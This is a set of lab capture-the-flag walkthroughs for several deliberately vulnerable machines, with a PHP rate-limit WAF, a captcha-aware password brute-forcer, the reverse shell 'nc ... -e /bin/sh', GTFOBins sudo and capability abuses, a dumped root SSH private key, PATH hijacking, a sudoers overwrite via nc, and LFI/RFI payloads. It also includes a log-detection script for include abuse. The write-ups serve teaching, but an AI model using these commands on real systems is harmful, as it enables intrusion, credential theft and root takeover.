private static function check($db) {
if (is_array($db)){
if (count($db) > 1) {
return array_count_values(array_column($db, 'ip'))[$_SERVER['REMOTE_ADDR']];
}
} else {
return 0;
}
}
private static function write($db,$dbf) {
file_put_contents(self::path.$dbf,serialize($db));
}
private static function add($db,$tm=1) {
array_push($db,['time'=>time() + (60*$tm), 'ip'=>$_SERVER['REMOTE_ADDR']]);
return $db;
}
public static function DoWAF ($hit){
while (!@mkdir(self::path.'db.lock',0777)) {
usleep(100000);
}
$db = self::loadClean(self::dbFile);
$bl = self::loadClean(self::blFile);
if( self::check($bl) > 0) {
self::forbidden();
} elseif($hit>0) {
$db = self::add($db);
self::write($db, self::dbFile);
if (self::check($db) >= self::attempts) {
self::write(self::add($bl,self::outTime), self::blFile);
self::forbidden();
}
if($hit == 403) {
self::forbidden();
} else {
self::notfound();
}
}
rmdir(self::path.'db.lock');
}
public static function forbidden () {
rmdir(self::path.'db.lock');
header('HTTP/1.0 403 Forbidden', true, 403);
die('<h1>Forbidden</h1>');
}
public static function notfound () {
rmdir(self::path.'db.lock');
header('HTTP/1.0 404 Not Found', true, 404);
die('<h1>Not Found</h1>');
}
}
WAF::DoWAF(isset($_GET['e'])?$_GET['e']:0);
?>
Reading waf.php: every hit is recorded with the client IP and a 60-second expiry, and once an IP has attempts=200 entries inside that window it is blacklisted for outTime=2 minutes. 60 requests a minute never reaches the threshold, which is why the throttled gobuster scan worked. Now escalate. sudo -l shows exiftool runnable as john without a password; exiftool's -filename= option moves its input file to the given name, so we can drop a public key into john's authorized_keys (the "Error removing old file" warning only means john cannot delete www-data's copy in /tmp; the copy into john's home still succeeds):
www-data@TheWall:/var/www/html$ sudo -l
Matching Defaults entries for www-data on TheWall:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on TheWall:
(john : john) NOPASSWD: /usr/bin/exiftool
www-data@TheWall:/var/www/html$ cd /tmp
www-data@TheWall:/tmp$ echo 'ssh-rsa <kali public key, elided> root@kali-plus' > authorized_keys
www-data@TheWall:/tmp$ INPUT=authorized_keys
www-data@TheWall:/tmp$ LFILE=/home/john/.ssh/authorized_keys
www-data@TheWall:/tmp$ sudo -u john exiftool -filename=$LFILE $INPUT
Warning: Error removing old file - authorized_keys
1 image files updated
┌──(root㉿kali-plus)-[~/.ssh]
└─# ssh john@192.168.1.102
The authenticity of host '192.168.1.102 (192.168.1.102)' can't be established.
ED25519 key fingerprint is SHA256:Ew2srZtokZQDN/Tw8xKgD2oEnd4Cgyo+aGT0drkNYQc.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.102' (ED25519) to the list of known hosts.
Linux TheWall 5.10.0-18-amd64 #1 SMP Debian 5.10.140-1 (2022-09-02) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Oct 19 17:07:17 2022 from 10.0.2.15
john@TheWall:~$ ls
user.txt
john@TheWall:~$ cat user.txt
cc5db5e7b0a26e807765f47a006f6221
Privilege escalation - root flag
Upload linpeas.sh again. Among files with capabilities it lists /usr/sbin/tar with cap_dac_read_search=ep; that capability bypasses file read-permission checks, so tar can read any file on the system regardless of owner and mode. The GTFOBins recipe passes the target file as the "archive" and uses -I to hand it to a shell command that just cats it to stderr, which dumps root's SSH private key:
Files with capabilities:
/usr/sbin/tar cap_dac_read_search=ep
/usr/bin/ping cap_net_raw=ep
john@TheWall:/$ LFILE=/id_rsa
john@TheWall:/$ /usr/sbin/tar xf "$LFILE" -I '/bin/bash -c "cat 1>&2"'
-----BEGIN OPENSSH PRIVATE KEY----- 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
-----END OPENSSH PRIVATE KEY-----
Save the key locally (here as tmp, with chmod 600 or ssh will refuse it) and log in with it:
┌──(root㉿kali-plus)-[~]
└─# ssh root@192.168.1.102 -i tmp
Linux TheWall 5.10.0-18-amd64 #1 SMP Debian 5.10.140-1 (2022-09-02) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Oct 19 19:51:15 2022 from 10.0.2.15
root@TheWall:~# ls
r0Ot.txT
root@TheWall:~# cat r0Ot.txT
4be82a3be9aed6eea5d0cce68e17662e
The same tar trick could read the root flag directly, but on this box it has been renamed to r0Ot.txT, so you would need a directory listing first anyway.
Krustykrab
Information gathering
The IP is 192.168.56.132, with 80 and 22 open. Port 80 is a stock Apache page whose source contains a <!--/var/www/html/finexo --> comment. /finexo has a login link top right, and /finexo/team.html lists staff names that look like usernames. One gotcha: the captcha has to be submitted in lowercase. I used a script from another write-up to brute-force the password; it fetches a fresh captcha on the same session before every attempt, because the captcha is tied to the session cookie:
import requests

WORDLIST_FILE = r"/usr/share/wordlists/rockyou.txt"
BASE_URL = 'http://192.168.56.132/finexo/'   # the box's IP from the scan above
LOGIN_URL = BASE_URL + 'login.php'
CAPTCHA_URL = BASE_URL + 'login.php?action=generateCaptcha'


def read_wordlist(path):
    # rockyou.txt is not valid UTF-8 throughout; skip bad bytes instead of crashing
    with open(path, 'r', encoding='utf-8', errors='ignore') as wordlist:
        for word in wordlist:
            yield word.strip()


session = requests.Session()   # one session: the captcha is bound to the PHP session cookie
for password in read_wordlist(WORDLIST_FILE):
    # A fresh captcha before every attempt; the server-side check expects lowercase
    captcha = session.get(CAPTCHA_URL).text.strip().lower()
    data = {
        'username': 'SpongeBob',
        'password': password,
        'captcha': captcha
    }
    response = session.post(LOGIN_URL, data=data)
    if 'Wrong' in response.text:
        print(f'[!] Wrong password {password}')
    elif 'Captcha' in response.text:
        print(f'[!] Wrong captcha {password}')
    else:
        print(f'[+] Found password {password}')
        break
After a while the password squarepants drops out:
[+] Found password squarepants
Once logged in, most features are dead ends. There is a mailbox with a message from a user called Administratro, and an upload form whose files are all renamed to .jpg, so nothing to exploit there. The edit profile page lets you change your password, and in the intercepted request the username is sent along with the new password; changing it to Administratro resets that account's password instead ({"success":true} means it took). Log out, log in as Administratro with the new password, and at the bottom of the admin page there is a command-execution feature: use it to get a shell.
user flag
nc 192.168.56.101 1234 -e /bin/sh
Looking for an escalation path:
┌──(root㉿kali-plus)-[~]
└─# nc -lvnp 1234
Listening on 0.0.0.0 1234
Connection received on 192.168.56.132 58090
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/usr/bin/script -qc /bin/bash /dev/null
www-data@KrustyKrab:/var/www/html/finexo/admin_dashborad$ sudo -l
Matching Defaults entries for www-data on KrustyKrab:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User www-data may run the following commands on KrustyKrab:
(KrustyKrab) NOPASSWD: /usr/bin/split
split can be run as KrustyKrab without a password. GTFOBins' --filter trick runs a shell command for every output chunk, and with /dev/stdin as the input that shell simply inherits our terminal:
www-data@KrustyKrab:/var/www/html/finexo/admin_dashborad$ sudo -u KrustyKrab split --filter=/bin/sh /dev/stdin
id
uid=1000(KrustyKrab) gid=1000(debian) groups=1000(debian),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),100(users),106(netdev),110(bluetooth),1002(krustygroup)
whoami
KrustyKrab
/usr/bin/script -qc /bin/bash /dev/null
KrustyKrab@KrustyKrab:/var/www/html/finexo/admin_dashborad$
That is a shell as KrustyKrab.
KrustyKrab@KrustyKrab:~$ cat user.txt
dcc8b0c111c9fa1522c7abfac8d1864b
Privilege escalation - root flag
The home directory also has a file called help:
KrustyKrab@KrustyKrab:~$ file help
help: GIF image data, version 89a, 480 x 270
It is a GIF. Pulled down and viewed locally, it shows SpongeBob assembling a Krabby Patty and spells out the order of the layers, so presumably a later step depends on that. Back to looking for an escalation path:
KrustyKrab@KrustyKrab:~$ sudo -l
Matching Defaults entries for KrustyKrab on KrustyKrab:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User KrustyKrab may run the following commands on KrustyKrab:
(spongebob) NOPASSWD: /usr/bin/ttteeesssttt
ttteeesssttt asks for the correct Krabby Patty assembly order:
KrustyKrab@KrustyKrab:~$ sudo -u spongebob /usr/bin/ttteeesssttt
Spongebob forgot how to make Krabby Patty, You need to help him!
Current shuffled recipe order:
A: Top bun
B: Ketchup
C: Mustard
D: Pickles
E: Tomato
F: Lettuce
G: Onion
H: Bottom bun
I: Patty
J: Cheese
Please enter the correct order using letters (e.g., ABCDEFGHIJ): Enter 10 letters (A-J):
Look at the gif obtained earlier, which shows the order, or simply run strings on it. The letters are shuffled differently on every run; the correct order is
Bottom bun
Patty
Lettuce
Cheese
Onion
Tomato
Ketchup
Mustard
Pickles
Top bun
Entering the correct order gives a shell as the spongebob user
KrustyKrab@KrustyKrab:~$ sudo -u spongebob /usr/bin/ttteeesssttt
Spongebob forgot how to make Krabby Patty, You need to help him!
Current shuffled recipe order:
A: Ketchup
B: Mustard
C: Onion
D: Tomato
E: Bottom bun
F: Top bun
G: Lettuce
H: Pickles
I: Cheese
J: Patty
Please enter the correct order using letters (e.g., ABCDEFGHIJ): Enter 10 letters (A-J): EJGICDABHF
Validation successful! Perfect Krabby Patty!
spongebob@KrustyKrab:/home/KrustyKrab$ id
uid=1001(spongebob) gid=1001(spongebob) groups=1001(spongebob),100(users),1002(krustygroup)
spongebob@KrustyKrab:/home/KrustyKrab$
Found 2 images and a note.txt
spongebob@KrustyKrab:~$ cat note.txt
Squidward is waiting for you!!!! password is md5($key1$key2).
It's not so hard as you think.
The hint says the password is the md5 of key1 and key2, so just look at them
spongebob@KrustyKrab:~$ cat key1
e1964798cfe86e914af895f8d0291812
spongebob@KrustyKrab:~$ md5sum key2.jpeg
5e1d0c1a168dc2d70004c2b00ba314ae key2.jpeg
Hashing gives 7ac254848d6e4556b73398dde2e4ef82, which is the password of the Squidward user
spongebob@KrustyKrab:~$ su - Squidward
Password: 7ac254848d6e4556b73398dde2e4ef82
$ id
uid=1002(Squidward) gid=1003(Squidward) groups=1003(Squidward)
Looking for a privilege escalation point turns up a laststep binary; run strings on it
Squidward@KrustyKrab:~$ strings laststep
/lib64/ld-linux-x86-64.so.2
setgid setuid
system __libc_start_main __cxa_finalize
libc.so.6 GLIBC_2.2.5 GLIBC_2.34
_ITM_deregisterTMCloneTable __gmon_start__ _ITM_registerTMCloneTable PTE1 u+UH cat /etc/shadow
It contains a cat /etc/shadow; copy the binary to the host and decompile it with IDA
int __cdecl main(int argc, const char **argv, const char **envp)
{
setgid(0);
setuid(0);
system("cat /etc/shadow");
return 0;
}
This can be exploited by environment variable (PATH) hijacking, since cat is resolved through PATH
echo '#!/bin/sh\n bash -p' > ~/cat
chmod +x ./cat
export PATH=~:$PATH
./laststep
Or
#include <unistd.h>
#include <stdlib.h>

/* Fake "cat" placed at the front of PATH: laststep has already called
   setgid(0)/setuid(0) before system("cat /etc/shadow"), so this runs as root. */
int main(void) {
    // setuid(0);
    // setgid(0);
    system("/bin/bash -p");
    return 0;
}
gcc cat.c -o cat
export PATH=.:$PATH
./laststep
root@KrustyKrab:/root# cat root.txt
efe397e3897f0c19ef0150c2b69046a3
Icecream
Information gathering
The IP address is 192.168.1.103; scan the ports
┌──(root㉿kali-plus)-[~]
└─# rustscan -a 192.168.1.103
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
0day was here ♥
[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.1.103:22
Open 192.168.1.103:80
Open 192.168.1.103:139
Open 192.168.1.103:445
Open 192.168.1.103:9000
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-19 19:05 CST
Initiating ARP Ping Scan at 19:05
Scanning 192.168.1.103 [1 port]
Completed ARP Ping Scan at 19:05, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:05
Completed Parallel DNS resolution of 1 host. at 19:05, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 2, OK: 1, NX: 0, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 19:05
Scanning bogon (192.168.1.103) [5 ports]
Discovered open port 80/tcp on 192.168.1.103
Discovered open port 139/tcp on 192.168.1.103
Discovered open port 445/tcp on 192.168.1.103
Discovered open port 22/tcp on 192.168.1.103
Discovered open port 9000/tcp on 192.168.1.103
Completed SYN Stealth Scan at 19:05, 0.05s elapsed (5 total ports)
Nmap scan report for bogon (192.168.1.103)
Host is up, received arp-response (0.0019s latency).
Scanned at 2025-04-19 19:05:06 CST for 0s
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
139/tcp open netbios-ssn syn-ack ttl 64
445/tcp open microsoft-ds syn-ack ttl 64
9000/tcp open cslistener syn-ack ttl 64
MAC Address: 08:00:27:4B:FC:76 (Oracle VirtualBox virtual NIC)
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds
Raw packets sent: 6 (248B) | Rcvd: 6 (248B)
With that many ports open, curl against port 80 returns forbidden, and a gobuster directory scan found nothing, so look at port 9000
{
  "certificates": {},
  "js_modules": {},
  "config": {
    "listeners": {},
    "routes": [],
    "applications": {}
  },
  "status": {
    "modules": {
      "python": {"version": "3.11.2", "lib": "/usr/lib/unit/modules/python3.11.unit.so"},
      "php": {"version": "8.2.18", "lib": "/usr/lib/unit/modules/php.unit.so"},
      "perl": {"version": "5.36.0", "lib": "/usr/lib/unit/modules/perl.unit.so"},
      "ruby": {"version": "3.1.2", "lib": "/usr/lib/unit/modules/ruby.unit.so"},
      "java": {"version": "17.0.11", "lib": "/usr/lib/unit/modules/java17.unit.so"},
      "wasm": {"version": "0.1", "lib": "/usr/lib/unit/modules/wasm.unit.so"},
      "wasm-wasi-component": {"version": "0.1", "lib": "/usr/lib/unit/modules/wasm_wasi_component.unit.so"}
    },
    "connections": {"accepted": 0, "active": 0, "idle": 0, "closed": 0},
    "requests": {"total": 0},
    "applications": {}
  }
}
The php version is listed, so php can be executed; first look at smb
user flag
┌──(root㉿kali-plus)-[~]
└─# smbclient //192.168.50.47/icecream
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> put reverse.php
putting file reverse.php as \reverse.php (766.2 kb/s) (average 766.2 kb/s)
Upload a reverse shell script over smb, then visit <ip>/reverse.php to get a shell. Once inside, look for a privilege escalation point: the home directory only has the ice user, so port 9000 is the only lead; look at the processes first
ice 499 468 0 07:07 ? 00:00:14 unit: controller
ice 500 468 0 07:07 ? 00:00:00 unit: router
There are processes belonging to the ice user, related to unit, which I do not know much about, so I read Todd's Todd-Hmv-Icecream
I found that this controlapi can control unit, and can even create a php Application by itself. The official docs control it locally through curl and --unix-socket, but here it can be driven directly over port 9000.
Come to think of it, anyone familiar with unit could escalate straight through port 9000, without first getting www-data.
Todd then worked out a few commands that give a shell as the ice user
curl -X PUT -d '{"app":{"type":"php","root":"/tmp","script":"reverse.php"}}' http://192.168.50.47:9000/config/applications
curl -X PUT -d '[{"action":{"share":"/tmp/reverse.php$uri","fallback":{"pass":"applications/app"}}}]' http://192.168.50.47:9000/config/routes
curl -X PUT -d '{"*:8888":{"pass":"routes"}}' http://192.168.50.47:9000/config/listeners
This gives a shell as ice; grab the user flag directly
ice@icecream:/home/ice$ cat user.txt
HMVaneraseroflove
Privilege escalation - root flag
Then look for a privilege escalation point
$ sudo -l
Matching Defaults entries for ice on icecream:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User ice may run the following commands on icecream:
(ALL) NOPASSWD: /usr/sbin/ums2net
A GitHub search found a project called ums2net, described as sharing USB mass storage over TCP; try using it the other way round to modify the sudoers file
echo "4444 of=/etc/sudoers bs=4096" > config
sudo /usr/sbin/ums2net -c config -d
Then connect with nc from the local machine
echo 'ice ALL=(ALL) NOPASSWD: ALL' |nc $IP 1234
ice@icecream:/$ sudo su -
sudo su -
/etc/sudoers:2:11: error de sintaxis
with the 'visudo' command as root. ^~~~~~~~
root@icecream:~# id
uid=0(root) gid=0(root) grupos=0(root)
root@icecream:~# ls
root.txt
root@icecream:~# cat root.txt
HMViminvisible
Quick
Information gathering
The IP address is 192.168.105.153
┌──(root㉿kali-plus)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:1d:89:b5, IPv4: 192.168.105.144
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.105.84 e0:2e:0b:94:50:57 Intel Corporate
192.168.105.153 08:00:27:41:d3:56 PCS Systemtechnik GmbH
192.168.105.221 32:6a:0e:02:96:dd (Unknown: locally administered)
3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.990 seconds (128.64 hosts/sec). 3 responded
Check the ports with rustscan
┌──(root㉿kali-plus)-[~]
└─# rustscan -a 192.168.105.153
[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.105.153:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-21 16:43 CST
Initiating ARP Ping Scan at 16:43
Scanning 192.168.105.153 [1 port]
Completed ARP Ping Scan at 16:43, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:43
Completed Parallel DNS resolution of 1 host. at 16:43, 0.05s elapsed
DNS resolution of 1 IPs took 0.05s. Mode: Async [#: 2, OK: 1, NX: 0, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 16:43
Scanning bogon (192.168.105.153) [1 port]
Discovered open port 80/tcp on 192.168.105.153
Completed SYN Stealth Scan at 16:43, 0.02s elapsed (1 total ports)
Nmap scan report for bogon (192.168.105.153)
Host is up, received arp-response (0.0011s latency).
Scanned at 2025-04-21 16:43:56 CST for 0s
PORT STATE SERVICE REASON
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:41:D3:56 (Oracle VirtualBox virtual NIC)
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.25 seconds
Raw packets sent: 2 (72B) | Rcvd: 2 (72B)
Apparently only port 80 is open; curl shows a web page, and it has a file inclusion vulnerability
user flag
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Quick Automative</title>
<link rel="stylesheet" href="styles.css">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css">
</head>
<body>
<header>
<!-- Photo by Pixabay: https://www.pexels.com/photo/black-lamborghini-murcielago-38570/ -->
<img src="images/logo.png" alt="Logo" height="100">
</header>
<nav>
<ul>
<li><a href="index.php?page=home">Home</a></li>
<li><a href="index.php?page=cars">Cars</a></li>
<li><a href="index.php?page=maintenance_and_repair">Maintenance & Repair</a></li>
<li><a href="index.php?page=about">About</a></li>
<li><a href="index.php?page=contact">Contact</a></li>
</ul>
</nav>
<main>
[the included home page: a second complete HTML document (title "Home"; sections "The Best Car Care Solutions for You", "Our Services", "Customer Reviews", "Get Your Car Care Done Today") rendered inside <main>]
</main>
<footer>
<div class="footer">
<p>© <script type="text/javascript">document.write("1950 - "+ new Date().getFullYear());</script> Quick Automative. All rights reserved.</p>
</div>
</footer>
</body>
</html>
The page parameter can be used to read out the source of index: http get http://192.168.105.153/index.php?page=php://filter/read=convert.base64-encode/resource=index
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Quick Automative</title>
<link rel="stylesheet" href="styles.css">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css">
</head>
<body>
<header>
<!-- Photo by Pixabay: https://www.pexels.com/photo/black-lamborghini-murcielago-38570/ -->
<img src="images/logo.png" alt="Logo" height="100">
</header>
<nav>
<ul>
<li><a href="index.php?page=home">Home</a></li>
<li><a href="index.php?page=cars">Cars</a></li>
<li><a href="index.php?page=maintenance_and_repair">Maintenance & Repair</a></li>
<li><a href="index.php?page=about">About</a></li>
<li><a href="index.php?page=contact">Contact</a></li>
</ul>
</nav>
<main>
<?php
if (isset($_GET['page'])) {
$page = $_GET['page'];
} else {
$page = 'home';
}
include($page . '.php');
?>
</main>
<footer>
<div class="footer">
<p>© <script type="text/javascript">document.write("1950 - "+ new Date().getFullYear());</script> Quick Automative. All rights reserved.</p>
</div>
</footer>
</body>
</html>
Try remotely including reverse.php hosted on kali to see whether a shell comes back: visiting 192.168.105.153/index.php?page=http://192.168.105.144:9999/reverse gives a reverse shell
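Detection for the two page= abuses above (the php://filter source read and the remote include), as an added example that is not part of this write-up: the regex flags any page value that is not a bare page name, and is_safe_page_value is the allowlist check a fixed index.php would apply before include(). The access-log lines are constructed.

```shell
#!/bin/sh
# Added example, not from the write-up: spot LFI/RFI attempts against the
# index.php?page= include in Apache access logs.
# A legitimate page name (home, cars, maintenance_and_repair, about, contact)
# only ever contains letters, digits, '_' and '-'. Anything else in the value
# (a stream wrapper such as php://filter, a URL scheme, '../', or URL-encoded
# forms of those) is an inclusion attempt. The same allowlist is what a fixed
# index.php should apply before calling include().

# Constructed sample access-log lines (combined log format, trimmed).
SAMPLE_LOG='192.168.105.144 - - [21/Apr/2025:16:50:01 +0800] "GET /index.php?page=home HTTP/1.1" 200 2410
192.168.105.144 - - [21/Apr/2025:16:51:13 +0800] "GET /index.php?page=php://filter/read=convert.base64-encode/resource=index HTTP/1.1" 200 3188
192.168.105.144 - - [21/Apr/2025:16:52:40 +0800] "GET /index.php?page=http://192.168.105.144:9999/reverse HTTP/1.1" 200 0
192.168.105.144 - - [21/Apr/2025:16:53:02 +0800] "GET /index.php?page=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 1804
192.168.105.144 - - [21/Apr/2025:16:54:10 +0800] "GET /index.php?page=contact HTTP/1.1" 200 1990'

# A page= value followed by a character that is neither allowed in a page name
# nor a query/request terminator (&, space, double quote).
PAGE_ABUSE_RE='page=[A-Za-z0-9_-]*[^A-Za-z0-9_&" -]'

# Allowlist check for one page value: returns 0 (true) only for a bare page name.
is_safe_page_value() {
    case $1 in
        ''|*[!A-Za-z0-9_-]*) return 1 ;;
        *) return 0 ;;
    esac
}

# Reads a log on stdin and prints the lines with a suspicious page= value.
flag_include_abuse() {
    grep -E "$PAGE_ABUSE_RE"
}

# Number of suspicious requests in the log text passed as $1.
count_include_abuse() {
    printf '%s\n' "$1" | grep -Ec "$PAGE_ABUSE_RE"
}

# Demo run over the constructed log: prints the three abusive requests.
printf '%s\n' "$SAMPLE_LOG" | flag_include_abuse
```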
First use find to see which SUID commands are available
www-data@quick:/home$ find / -perm -u=s -type f 2>/dev/null
/snap/core20/1828/usr/bin/chfn
/snap/core20/1828/usr/bin/chsh
/snap/core20/1828/usr/bin/gpasswd
/snap/core20/1828/usr/bin/mount
/snap/core20/1828/usr/bin/newgrp
/snap/core20/1828/usr/bin/passwd
/snap/core20/1828/usr/bin/su
/snap/core20/1828/usr/bin/sudo
/snap/core20/1828/usr/bin/umount
/snap/core20/1828/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/1828/usr/lib/openssh/ssh-keysign
/snap/snapd/18357/usr/lib/snapd/snap-confine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/bin/at
/usr/bin/sudo
/usr/bin/umount
/usr/bin/mount
/usr/bin/chsh
/usr/bin/su
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/php7.0
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/fusermount
php7.0 is usable; check GTFOBins
sudo install -m =xs $(which php) .
